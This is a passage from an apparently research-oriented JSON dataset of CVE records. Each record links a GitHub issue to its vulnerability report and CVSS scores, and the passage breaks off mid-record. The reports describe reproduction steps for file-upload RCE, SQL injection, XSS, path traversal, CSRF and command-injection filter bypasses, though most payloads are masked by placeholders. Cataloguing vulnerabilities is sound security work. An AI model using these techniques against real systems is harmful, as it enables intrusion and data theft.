  59600. "description": "Remote Code Execution via File Upload Restriction Bypass. Vulnerability Description I have observed that it is possible to upload php file on the system through manage files functionality which leads to compromise the system. As I'm able to upload malicious php file with APITAG extension, and able to execute php code on the server. Observation On line NUMBERTAG of APITAG , I observed that the application uses blacklist extensions to restrict the php malicious file which can be easily bypassed with APITAG extension. Steps to Reproduce NUMBERTAG Login into the application's admin panel NUMBERTAG Navigate to the APITAG NUMBERTAG Now upload the php file with APITAG extension, for e.g. APITAG . FILETAG NUMBERTAG After uploading the php file, navigate to the APITAG . FILETAG Mitigation Rename the uploaded files to some random filenames, remove the file extension and then append your allowed file extension. Whitelisted extension approach should be applied instead of blacklisting. Correct use of APITAG should be applied as shown below for preventing the php file execution in upload directory. APITAG Reference URLTAG FILETAG",
  59601. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  59602. "severity": "HIGH",
  59603. "baseScore": 7.2,
  59604. "impactScore": 5.9,
  59605. "exploitabilityScore": 1.2
  59606. },
  59607. {
  59608. "CVE_ID": "CVE-2020-29651",
  59609. "Issue_Url_old": "https://github.com/pytest-dev/py/issues/256",
  59610. "Issue_Url_new": "https://github.com/pytest-dev/py/issues/256",
  59611. "Repo_new": "pytest-dev/py",
  59612. "Issue_Created_At": "2020-09-03T09:21:46Z",
  59613. "description": "Vulnerable Regular Expression in svnwc.py. Type of Issue Potential Regex Denial of Service APITAG Description The vulnerable regular expression is located in URLTAG The APITAG vulnerabilitiy of the regex is mainly due to the sub pattern (\\d+)\\s (\\S+) and can be exploited with the following string NUMBERTAG I think you can limit the input length or modify this regex.",
  59614. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59615. "severity": "HIGH",
  59616. "baseScore": 7.5,
  59617. "impactScore": 3.6,
  59618. "exploitabilityScore": 3.9
  59619. },
  59620. {
  59621. "CVE_ID": "CVE-2020-29657",
  59622. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4244",
  59623. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4244",
  59624. "Repo_new": "jerryscript-project/jerryscript",
  59625. "Issue_Created_At": "2020-09-29T00:45:00Z",
  59626. "description": "Out of bound read in APITAG APITAG revision APITAG (latest master APITAG Build platform Ubuntu NUMBERTAG APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Execution steps APITAG Output ERRORTAG Expected behavior Please consider that the error line may be larger than the test case line number. The above \"try\" test case has just three lines, but the error happened on line NUMBERTAG a \"catch\" block is needed. ) The jerry_port_read_source (path_str_p, &source_size) called in the APITAG need to malloc more memory to locate an error happened out of the source_size.",
  59627. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  59628. "severity": "CRITICAL",
  59629. "baseScore": 9.1,
  59630. "impactScore": 5.2,
  59631. "exploitabilityScore": 3.9
  59632. },
  59633. {
  59634. "CVE_ID": "CVE-2020-35132",
  59635. "Issue_Url_old": "https://github.com/leenooks/phpLDAPadmin/issues/130",
  59636. "Issue_Url_new": "https://github.com/leenooks/phpldapadmin/issues/130",
  59637. "Repo_new": "leenooks/phpldapadmin",
  59638. "Issue_Created_At": "2020-12-01T15:05:22Z",
  59639. "description": "XSS in FILETAG for NUMBERTAG A user can set a field to an XSS payload, which triggers when the confirmation screen for whether to confirm the change is raised. From FILETAG , say I have an attribute set to the following: FILETAG Then, say I am an admin and would like to change that field back: FILETAG When the field prompts me for a change, the payload is triggered. A user can log into user NUMBERTAG and request a change, then wait for an admin to try deleting the field, which would trigger the payload for that user. FILETAG",
  59640. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  59641. "severity": "MEDIUM",
  59642. "baseScore": 5.4,
  59643. "impactScore": 2.7,
  59644. "exploitabilityScore": 2.3
  59645. },
  59646. {
  59647. "CVE_ID": "CVE-2020-35176",
  59648. "Issue_Url_old": "https://github.com/eldy/awstats/issues/195",
  59649. "Issue_Url_new": "https://github.com/eldy/awstats/issues/195",
  59650. "Repo_new": "eldy/awstats",
  59651. "Issue_Created_At": "2020-12-09T14:40:12Z",
  59652. "description": "path traversal flaw. Hi, It seems NUMBERTAG is not completely fixed in NUMBERTAG that is, even after CVETAG and CVETAG are fixed) Altering slightly the original example: URLTAG to e.g.: URLTAG ERRORTAG URLTAG ERRORTAG FILETAG ERRORTAG it is still parsing /etc/ . I'd expect it to only allow files within PATHTAG .conf. Like NUMBERTAG this requires that PATHTAG does not exist (e.g. in multi hosting environments with no default config).",
  59653. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  59654. "severity": "MEDIUM",
  59655. "baseScore": 5.3,
  59656. "impactScore": 1.4,
  59657. "exploitabilityScore": 3.9
  59658. },
  59659. {
  59660. "CVE_ID": "CVE-2020-35240",
  59661. "Issue_Url_old": "https://github.com/hemantsolo/CVE-Reference/issues/1",
  59662. "Issue_Url_new": "https://github.com/hemantsolo/cve-reference/issues/1",
  59663. "Repo_new": "hemantsolo/cve-reference",
  59664. "Issue_Created_At": "2021-01-08T02:46:00Z",
  59665. "description": "CVETAG : Your example is not reproducible. Your example is not reproducible: >payload in APITAG Content\" APITAG doesn't have APITAG Content\" APITAG go to the URL: URLTAG APITAG the payload in Content: FILETAG on its form does not contain Content field > and the attacker can able to steal the cookie according to the crafted payload. In APITAG user cookies are not accessible from javascript. The httponly flag is enabled by default. URLTAG Or are you talking about admin functions (files admin_ .php)? P.S. URLTAG",
  59666. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  59667. "severity": "MEDIUM",
  59668. "baseScore": 4.8,
  59669. "impactScore": 2.7,
  59670. "exploitabilityScore": 1.7
  59671. },
  59672. {
  59673. "CVE_ID": "CVE-2020-35242",
  59674. "Issue_Url_old": "https://github.com/balloonwj/flamingo/issues/47",
  59675. "Issue_Url_new": "https://github.com/balloonwj/flamingo/issues/47",
  59676. "Repo_new": "balloonwj/flamingo",
  59677. "Issue_Created_At": "2020-11-27T10:59:59Z",
  59678. "description": "There are security risks in the operation of the server on the database. issue NUMBERTAG ulnerability There is a SQL injection vulnerability in the APITAG method. The related business corresponding to the method is the registered account. userid , username , nickname can be controlled, no filtering measures, and directly execute the entire SQL statement. Looking at the code, it is found that the client does not encrypt the transmission data, and the registration information is returned to the server in clear text. Therefore, it can be injected directly in the client registration window. ERRORTAG Poc payload: APITAG or APITAG FILETAG FILETAG FILETAG issue NUMBERTAG ulnerability There is a SQL injection vulnerability in the APITAG method. newteaminfo can be controlled ERRORTAG Poc The client has an input length limit, but the defense of the client is invalid. Hard code the payload into the program. payload: APITAG FILETAG FILETAG issue NUMBERTAG ulnerability There is a SQL injection vulnerability in the APITAG method. groupname can be controlled ERRORTAG Create a group chat function can trigger this function. FILETAG payload\uff1a APITAG The client has an input length limit, but the defense of the client is invalid. Hard code the payload into the program. Find the place where the client sends the json, and hard code the payload in. FILETAG FILETAG issue NUMBERTAG ulnerability There is a SQL injection vulnerability in the APITAG method. ERRORTAG Poc payload: APITAG FILETAG FILETAG",
  59679. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59680. "severity": "CRITICAL",
  59681. "baseScore": 9.8,
  59682. "impactScore": 5.9,
  59683. "exploitabilityScore": 3.9
  59684. },
  59685. {
  59686. "CVE_ID": "CVE-2020-35284",
  59687. "Issue_Url_old": "https://github.com/balloonwj/flamingo/issues/48",
  59688. "Issue_Url_new": "https://github.com/balloonwj/flamingo/issues/48",
  59689. "Repo_new": "balloonwj/flamingo",
  59690. "Issue_Created_At": "2020-12-01T06:20:12Z",
  59691. "description": "Directory traversal vulnerability exists in uploaded and downloaded files. Directory traversal Through code audit, it is found that the file download function in flamingo has a problem with directory traversal. Through this vulnerability, files can be downloaded anywhere on the server through the directory. Test environment CODETAG Vulnerability analysis Flamingo is a C/S mode communication APITAG A sends the file to user B. The server saves the file in A specific folder of the server and waits for User B to receive it. After User B sends the receive request, the server sends the corresponding file to user B. When uploading files, use the result of file md5 encoding as the file name (unfortunately, the encryption process is on the client side). The base directory of the cache file is hard coded in the configuration file, and the corresponding file path is directly spliced \u200b\u200bthrough the base directory and the md5 result. The file has no identification for a specific user, all files exist together, and there is no distinction between different users (that is, the server does not know who the file belongs to, and it can be downloaded as long as the correct file path is provided to the server). Poc From the simple analysis above, it can be seen that this file transfer function has a lot of security issues. Only the most serious problems are demonstrated here. It can be seen from the declaration of the APITAG function in APITAG APITAG Since the download path is directly spliced \u200b\u200bby the base directory and the md5 result, as long as the file name can be controlled, the file name of the form PATHTAG can be used to achieve directory traversal and download any file . Flamingo's problem is that MD5 encryption is done on the client side, and because the communication protocol is open source, it is easy to forge. Find the location where the client sends the download command and tamper with the file name. Add the following statement to the APITAG FILETAG FILETAG FILETAG FILETAG During the test, it is found that when the tampered file path does not exist, the server will first create the file, then write the contents of the sent file, and then download it for the recipient.So using this vulnerability can also achieve arbitrary location write (can be multi level directory traversal). FILETAG Send the file again APITAG file is written on Desktop. FILETAG",
  59692. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  59693. "severity": "HIGH",
  59694. "baseScore": 7.5,
  59695. "impactScore": 3.6,
  59696. "exploitabilityScore": 3.9
  59697. },
  59698. {
  59699. "CVE_ID": "CVE-2020-35337",
  59700. "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/24",
  59701. "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/24",
  59702. "Repo_new": "thinksaas/thinksaas",
  59703. "Issue_Created_At": "2020-12-03T10:11:46Z",
  59704. "description": "Post Auth SQL injection vulnerability in PATHTAG SQL\u6ce8\u5165. Details can be retrived in FILETAG Author of the vuln: Qianxin, Network Security Department, Product Safety Team ( Unc1e ) PATHTAG \u7684title\u53c2\u6570\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e CODETAG Will cause a delay of NUMBERTAG seconds FILETAG",
  59705. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59706. "severity": "CRITICAL",
  59707. "baseScore": 9.8,
  59708. "impactScore": 5.9,
  59709. "exploitabilityScore": 3.9
  59710. },
  59711. {
  59712. "CVE_ID": "CVE-2020-35346",
  59713. "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/4",
  59714. "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/4",
  59715. "Repo_new": "cbkhwx/cxuucmsv3",
  59716. "Issue_Created_At": "2020-12-04T09:19:47Z",
  59717. "description": "A xss vulnerability was discovered in cxuucms NUMBERTAG There is a Persistent XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the imgurl parameter of APITAG POC ERRORTAG Vulnerability trigger point URLTAG When attacker access system settings all content add. Write poc in statcode form which framed with red line and then save the form. Then the content will be save and the article will be published. FILETAG FILETAG Then view the article webpage named test xss in home page , XSS vulnerability is triggered successfully. FILETAG FILETAG",
  59718. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  59719. "severity": "MEDIUM",
  59720. "baseScore": 4.8,
  59721. "impactScore": 2.7,
  59722. "exploitabilityScore": 1.7
  59723. },
  59724. {
  59725. "CVE_ID": "CVE-2020-35347",
  59726. "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/5",
  59727. "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/5",
  59728. "Repo_new": "cbkhwx/cxuucmsv3",
  59729. "Issue_Created_At": "2020-12-06T05:10:25Z",
  59730. "description": "There is one CSRF vulnerability that can add the administrator account.. Title : There is one CSRF vulnerability in cxuucms3 that can add the administrator account Description : After the administrator logged in, open the following page, an administrator acount will be created. And attacker an log in to the background using the created account and password. Poc\uff1a APITAG Submuit request CODETAG files : PATHTAG FILETAG PATHTAG FILETAG Suggest \uff1a Verify referer or token before submitting request.",
  59731. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  59732. "severity": "MEDIUM",
  59733. "baseScore": 6.5,
  59734. "impactScore": 3.6,
  59735. "exploitabilityScore": 2.8
  59736. },
  59737. {
  59738. "CVE_ID": "CVE-2020-35380",
  59739. "Issue_Url_old": "https://github.com/tidwall/gjson/issues/192",
  59740. "Issue_Url_new": "https://github.com/tidwall/gjson/issues/192",
  59741. "Repo_new": "tidwall/gjson",
  59742. "Issue_Created_At": "2020-12-07T02:55:43Z",
  59743. "description": "panic: runtime error: slice bounds out of range. payload: func APITAG { APITAG := APITAG APITAG APITAG } goroutine NUMBERTAG running]: PATHTAG NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG b2) PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG aa NUMBERTAG b NUMBERTAG c NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG fa PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG aa NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG aa NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG da NUMBERTAG c NUMBERTAG a NUMBERTAG c NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG ac PATHTAG NUMBERTAG c NUMBERTAG da NUMBERTAG c NUMBERTAG a NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG ccb PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG",
  59744. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59745. "severity": "HIGH",
  59746. "baseScore": 7.5,
  59747. "impactScore": 3.6,
  59748. "exploitabilityScore": 3.9
  59749. },
  59750. {
  59751. "CVE_ID": "CVE-2020-35381",
  59752. "Issue_Url_old": "https://github.com/buger/jsonparser/issues/219",
  59753. "Issue_Url_new": "https://github.com/buger/jsonparser/issues/219",
  59754. "Repo_new": "buger/jsonparser",
  59755. "Issue_Created_At": "2020-12-07T02:14:37Z",
  59756. "description": "panic: runtime error: slice bounds out of range. payload: func APITAG { APITAG := APITAG s, _ := APITAG APITAG APITAG } panic: runtime error: slice bounds out of range NUMBERTAG goroutine NUMBERTAG running]: PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG d7e NUMBERTAG c NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG fdb PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG d7e NUMBERTAG c NUMBERTAG d7d NUMBERTAG e NUMBERTAG afb NUMBERTAG c NUMBERTAG d7dc0, ...) PATHTAG NUMBERTAG a6 PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG d7e NUMBERTAG c NUMBERTAG d7e NUMBERTAG c NUMBERTAG d7e NUMBERTAG c NUMBERTAG d7e NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG d7e NUMBERTAG PATHTAG NUMBERTAG e",
  59757. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59758. "severity": "HIGH",
  59759. "baseScore": 7.5,
  59760. "impactScore": 3.6,
  59761. "exploitabilityScore": 3.9
  59762. },
  59763. {
  59764. "CVE_ID": "CVE-2020-35382",
  59765. "Issue_Url_old": "https://github.com/craigrodway/classroombookings/issues/27",
  59766. "Issue_Url_new": "https://github.com/craigrodway/classroombookings/issues/27",
  59767. "Repo_new": "craigrodway/classroombookings",
  59768. "Issue_Created_At": "2020-12-08T13:17:44Z",
  59769. "description": "Classbooking NUMBERTAG has SQL injection. After the administrator logs in, when adding a new user, choose to import the csv file, and there is SQL injection in the csv file username. FILETAG The csv file is as follows: ERRORTAG If mysql has writable permissions\uff0cthis csv file will create a new phpinfo file in the website directory. the POST file is: ERRORTAG FILETAG FILETAG",
  59770. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  59771. "severity": "HIGH",
  59772. "baseScore": 7.2,
  59773. "impactScore": 5.9,
  59774. "exploitabilityScore": 1.2
  59775. },
  59776. {
  59777. "CVE_ID": "CVE-2020-35437",
  59778. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/880",
  59779. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/880",
  59780. "Repo_new": "intelliants/subrion",
  59781. "Issue_Created_At": "2020-12-12T19:10:41Z",
  59782. "description": "PATHTAG stored xss vulnerability. Hello there: I found a stored xss vulnerability in PATHTAG Reproduce through the avatar FILETAG APITAG APITAG",
  59783. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  59784. "severity": "MEDIUM",
  59785. "baseScore": 6.1,
  59786. "impactScore": 2.7,
  59787. "exploitabilityScore": 2.8
  59788. },
  59789. {
  59790. "CVE_ID": "CVE-2020-35470",
  59791. "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/14087",
  59792. "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/14087",
  59793. "Repo_new": "envoyproxy/envoy",
  59794. "Issue_Created_At": "2020-11-18T23:58:28Z",
  59795. "description": "Wrong %DOWNSTREAM_REMOTE_ADDRESS% logged when using proxy protocol with tcp proxy. When using proxy protocol as a listener filter, tcp proxy as the network filter, and access logging, the wrong downstream address is logged. The logged address should be the one from the proxy protocol header on the connection, but the direct peer address is logged instead.",
  59796. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59797. "severity": "HIGH",
  59798. "baseScore": 8.8,
  59799. "impactScore": 5.9,
  59800. "exploitabilityScore": 2.8
  59801. },
  59802. {
  59803. "CVE_ID": "CVE-2020-35471",
  59804. "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/14113",
  59805. "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/14113",
  59806. "Repo_new": "envoyproxy/envoy",
  59807. "Issue_Created_At": "2020-11-20T05:41:27Z",
  59808. "description": "crash when udp packet size large than NUMBERTAG crash when udp packet size large than NUMBERTAG Description envoy crash when udp packet size large than NUMBERTAG Is there any way to modify the packet size limit? Repro steps start envoy crash shen receive packget that size large than NUMBERTAG ERRORTAG Config yaml admin: access_log_path: /tmp/admin_access.log address: socket_address: protocol: TCP address NUMBERTAG port_value NUMBERTAG static_resources: listeners: name: listener_udp reuse_port: true address: socket_address: protocol: UDP address NUMBERTAG port_value NUMBERTAG listener_filters: name: APITAG typed_config: ' APITAG APITAG stat_prefix: service cluster: conf_jira_udp clusters: name: conf_jira_udp connect_timeout NUMBERTAG s type: STATIC lb_policy: ROUND_ROBIN load_assignment: cluster_name: conf_jira_udp endpoints: lb_endpoints: endpoint: address: socket_address: address: APITAG port_value NUMBERTAG Logs ERRORTAG",
  59809. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59810. "severity": "HIGH",
  59811. "baseScore": 7.5,
  59812. "impactScore": 3.6,
  59813. "exploitabilityScore": 3.9
  59814. },
  59815. {
  59816. "CVE_ID": "CVE-2020-35476",
  59817. "Issue_Url_old": "https://github.com/OpenTSDB/opentsdb/issues/2051",
  59818. "Issue_Url_new": "https://github.com/opentsdb/opentsdb/issues/2051",
  59819. "Repo_new": "opentsdb/opentsdb",
  59820. "Issue_Created_At": "2020-11-18T09:02:48Z",
  59821. "description": "APITAG NUMBERTAG Remote Code Execution. During a Pentest we found a remote code execution vulnerability in APITAG NUMBERTAG and below using command injection in the yrange parameter (other parameters might be vulnerable as well) When passing the payload via one of the parameters it is written to a gnuplot file in the /tmp directory and the gnuplot file is executed by APITAG via the FILETAG shell script. There was an attempt to block command injections by blocking back ticks but we were able to bypass it: PATHTAG ERRORTAG Bypass Payload: APITAG APITAG URLTAG The gnuplot file created in the temp directory by APITAG would look something like this: ERRORTAG When executed by APITAG FILETAG the FILETAG file will be written to the temp directory.",
  59822. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59823. "severity": "CRITICAL",
  59824. "baseScore": 9.8,
  59825. "impactScore": 5.9,
  59826. "exploitabilityScore": 3.9
  59827. },
  59828. {
  59829. "CVE_ID": "CVE-2020-35490",
  59830. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2986",
  59831. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2986",
  59832. "Repo_new": "fasterxml/jackson-databind",
  59833. "Issue_Created_At": "2020-12-14T21:48:07Z",
  59834. "description": "Block one more gadget type ( , CVE xxxx xxx). (note: placeholder until issue verified) Another gadget type(s) reported regarding class(es) of (withhold until fixed). library. See URLTAG for description of the general problem. Mitre id: [to be allocated] Reporter(s): Fix will be included in:",
  59835. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59836. "severity": "HIGH",
  59837. "baseScore": 8.1,
  59838. "impactScore": 5.9,
  59839. "exploitabilityScore": 2.2
  59840. },
  59841. {
  59842. "CVE_ID": "CVE-2020-35518",
  59843. "Issue_Url_old": "https://github.com/389ds/389-ds-base/issues/4480",
  59844. "Issue_Url_new": "https://github.com/389ds/389-ds-base/issues/4480",
  59845. "Repo_new": "389ds/389-ds-base",
  59846. "Issue_Created_At": "2020-12-08T16:04:36Z",
  59847. "description": "Unexpected info returned to ldap request. Issue Description A ldap result can contain additional information. Such information should not allow a client application to guess if an entry exists or not Package Version and Platform: This bug impacts all release after NUMBERTAG Steps to Reproduce to be provided with an automatic testcase Expected results A ldap request should not provide any tips if an entry exists or not",
  59848. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  59849. "severity": "MEDIUM",
  59850. "baseScore": 5.3,
  59851. "impactScore": 1.4,
  59852. "exploitabilityScore": 3.9
  59853. },
  59854. {
  59855. "CVE_ID": "CVE-2020-35579",
  59856. "Issue_Url_old": "https://github.com/tindy2013/subconverter/issues/284",
  59857. "Issue_Url_new": "https://github.com/tindy2013/subconverter/issues/284",
  59858. "Repo_new": "tindy2013/subconverter",
  59859. "Issue_Created_At": "2020-12-19T14:52:24Z",
  59860. "description": "vulnerability] Loop Request\u68c0\u6d4b\u5b58\u5728\u95ee\u9898\uff0c\u53ef\u5b9e\u73b0\u62d2\u7edd\u670d\u52a1\u653b\u51fb / Loop Request detection is too fragile and can realize denial of service attacks.. \u6f0f\u6d1e\u5371\u5bb3 \u901a\u8fc7\u53d1\u9001\u4e00\u4e2a\u8bf7\u6c42\u5230\u670d\u52a1\u5668\uff0c\u5b9e\u73b0\u62d2\u7edd\u670d\u52a1/\u670d\u52a1\u7f13\u6162 \u6f0f\u6d1e\u539f\u7406 \u901a\u8fc7\u7cbe\u5fc3\u6784\u9020\u7684\u8bf7\u6c42\u5934\uff0c\u7ed5\u8fc7 Loop request \u9632\u5fa1\uff0c\u914d\u5408HTTP NUMBERTAG Loop request \u653b\u51fb\u3002 \u8be5\u7a0b\u5e8f\u5b58\u5728\u4e00\u4e2a\u516c\u5f00\u8bbf\u95ee\u7684[\u5916\u90e8API URLTAG : APITAG \u5176\u4e2d\u7684\u4e00\u4e2a\u540d\u4e3a url APITAG url \u7684 GET NUMBERTAG Loop request \u6211\u4eec\u53ef\u4ee5\u6784\u9020\u8fd9\u6837\u7684\u4e00\u4e2aurl\uff0c\u6211\u4eec\u53eb\u5b83 APITAG \uff1a APITAG \u5176\u4e2d APITAG \u4e5f\u662f\u4e00\u4e2aurl\uff0c\u5728\u4efb\u4f55\u65f6\u5019\u5b83\u90fd\u8fd4\u56de\u4e00\u4e2a APITAG \u54cd\u5e94\uff0c\u5c06\u8bf7\u6c42\u91cd\u5b9a\u5411\u5230 APITAG APITAG \u5411\u8be5\u670d\u52a1\u5668\u53d1\u9001\u4e00\u4e2aGET\u8bf7\u6c42\uff0curl\u662f APITAG \uff0c\u670d\u52a1\u5668\u4f1a\u8bf7\u6c42 APITAG \u3002\u7531\u4e8e\u91cd\u5b9a\u5411\uff0c\u670d\u52a1\u5668\u4f1a\u8bbf\u95ee APITAG \uff08\u81ea\u5df1\u8bbf\u95ee\u81ea\u5df1\uff09\uff0c\u9020\u6210 Loop request FILETAG APITAG NUMBERTAG Loop request \u9632\u5fa1 \u8be5\u7a0b\u5e8f\u901a\u8fc7\u68c0\u67e5\u8bf7\u6c42\u5934\u6765\u5b9e\u65bd\u5bf9 Loop request \u653b\u51fb\u7684\u9632\u5fa1\uff1a \u5728\u5411\u5916\u90e8\u53d1\u9001\u8bf7\u6c42\u65f6\uff0c\u4f1a\u5e26\u4e0a\u4e00\u4e2a\u81ea\u5b9a\u4e49\u7684\u8bf7\u6c42\u5934 APITAG \uff1a URLTAG \u901a\u8fc7\u68c0\u67e5\u8bf7\u6c42\u5934\u4e2d\u662f\u5426\u5305\u542b APITAG \uff0c\u4e14\u5b83\u7684\u503c\u662f\u5426\u4e3a APITAG \u6765\u62d2\u7edd Loop request \uff1a URLTAG URLTAG FILETAG \u4f46\u662f\u8be5\u68c0\u6d4b\u65b9\u5f0f\u5b58\u5728\u6f0f\u6d1e\u3002 \u5728\u670d\u52a1\u5668\u53d1\u51fa\u8bf7\u6c42 APITAG \u65f6\uff0c\u4f1a\u987a\u5e26\u5c06\u653b\u51fb\u8005\u8bf7\u6c42 APITAG \u65f6\u53d1\u9001\u7684\u6240\u6709HTTP\u8bf7\u6c42\u5934\u4e5f\u5e26\u4e0a\uff0c\u50cf\u4e0b\u9762\u8fd9\u6837\uff1a FILETAG \u56e0\u6b64\uff0c\u6211\u4eec\u53ef\u4ee5\u7528curl\u8bf7\u6c42 APITAG \uff0c\u5e76\u4e14\u5305\u542b\u4e00\u4e2a\u53eb\u505a APITAG \u7684\u8bf7\u6c42\u5934\uff0c\u4f46\u662f\u503c\u4e0d\u662f APITAG \uff0c\u800c\u662f APITAG \uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u5f97\u5230\uff0c\u4e24\u4e2a APITAG \ud83d\udca5\ud83d\udca5 FILETAG \u7a0b\u5e8f\u4f7f\u7528libev\u7684 evhttp_find_header URLTAG APITAG APITAG \u7684\u503c\u88ab\u6211\u4eec\u8986\u76d6\u6210\u4e86 APITAG \uff0c\u4ece\u800c\u7ed5\u8fc7\u4e86 Loop request NUMBERTAG FILETAG \u4e0b\u8f7d\u53d1\u5e03\u7684\u4e8c\u8fdb\u5236\u6587\u4ef6\uff0c\u5728\u672c\u5730\u542f\u52a8\u4e00\u4e2a\u670d\u52a1\u7a0b\u5e8f\uff1a APITAG NUMBERTAG APITAG \uff1a URLTAG \u5176\u4e2d APITAG \u662f\u4e00\u4e2a\u77ed\u94fe\u63a5\u670d\u52a1\uff1a URLTAG NUMBERTAG APITAG \uff1a CODETAG NUMBERTAG APITAG \u8bf7\u6c42\uff1a APITAG \u8be5\u8bf7\u6c42\u53d1\u51fa\u540e\uff0c\u7a0b\u5e8f\u5f00\u59cb\u8fdb\u5165\u65e0\u9650\u7684 Loop Request FILETAG \u6b64\u540e\u65b0\u7684\u8bf7\u6c42\u5230\u6765\u65f6\u8868\u73b0\u4e3a\u8bf7\u6c42\u7f13\u6162\uff0c\u6216\u8005\u62d2\u7edd\u670d\u52a1 \u4fee\u590d\u5efa\u8bae \u53bb\u6389 APITAG \u51fd\u6570\uff0c\u5c06\u68c0\u6d4b\u903b\u8f91\u6539\u6210\u68c0\u6d4b APITAG \u5934\u662f\u5426\u5b58\u5728 URLTAG",
  59861. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59862. "severity": "HIGH",
  59863. "baseScore": 7.5,
  59864. "impactScore": 3.6,
  59865. "exploitabilityScore": 3.9
  59866. },
  59867. {
  59868. "CVE_ID": "CVE-2020-35597",
  59869. "Issue_Url_old": "https://github.com/VictorAlagwu/CMSsite/issues/16",
  59870. "Issue_Url_new": "https://github.com/victoralagwu/cmssite/issues/16",
  59871. "Repo_new": "victoralagwu/cmssite",
  59872. "Issue_Created_At": "2020-12-17T11:42:51Z",
  59873. "description": "SQL Injection vulnerabilities in different features. Following parameters are vulnerable to SQL Injection. I will try to fix these vulnerabilities.",
  59874. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  59875. "severity": "HIGH",
  59876. "baseScore": 8.8,
  59877. "impactScore": 5.9,
  59878. "exploitabilityScore": 2.8
  59879. },
  59880. {
  59881. "CVE_ID": "CVE-2020-35605",
  59882. "Issue_Url_old": "https://github.com/kovidgoyal/kitty/issues/3128",
  59883. "Issue_Url_new": "https://github.com/kovidgoyal/kitty/issues/3128",
  59884. "Repo_new": "kovidgoyal/kitty",
  59885. "Issue_Created_At": "2020-11-29T06:25:25Z",
